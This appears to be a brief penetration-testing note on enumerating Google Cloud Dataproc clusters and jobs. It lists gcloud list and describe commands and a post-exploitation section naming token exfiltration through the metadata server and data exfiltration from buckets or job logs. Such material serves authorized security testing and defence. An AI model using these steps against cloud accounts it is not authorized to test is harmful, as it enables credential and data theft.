GCP Dataproc Enum

Basic Infromation

Google Cloud Dataproc is a fully managed service for running Apache Spark, Apache Hadoop, Apache Flink, and other big data frameworks. It is primarily used for data processing, querying, machine learning, and stream analytics. Dataproc enables organizations to create clusters for distributed computing with ease, integrating seamlessly with other Google Cloud Platform (GCP) services like Cloud Storage, BigQuery, and Cloud Monitoring.

Dataproc clusters run on virtual machines (VMs), and the service account associated with these VMs determines the permissions and access level of the cluster.

Components

A Dataproc cluster typically includes:

Master Node: Manages cluster resources and coordinates distributed tasks.

Worker Nodes: Execute distributed tasks.

Service Accounts: Handle API calls and access other GCP services.

Enumeration

Dataproc clusters, jobs, and configurations can be enumerated to gather sensitive information, such as service accounts, permissions, and potential misconfigurations.

Cluster Enumeration

To enumerate Dataproc clusters and retrieve their details:

gcloud dataproc clusters list --region=<region>
gcloud dataproc clusters describe <cluster-name> --region=<region>

Job Enumeration

gcloud dataproc jobs list --region=<region>
gcloud dataproc jobs describe <job-id> --region=<region>

Post Exploitation

Enumerating Dataproc clusters can expose sensitive data, such as tokens, configuration scripts, or job output logs, which can be leveraged for further exploitation. Misconfigured roles or excessive permissions granted to the service account can allow:

Access to sensitive APIs (e.g., BigQuery, Cloud Storage).

Token Exfiltration via metadata server.

Data Exfiltration from misconfigured buckets or job logs.

1.8 KiB Raw Blame History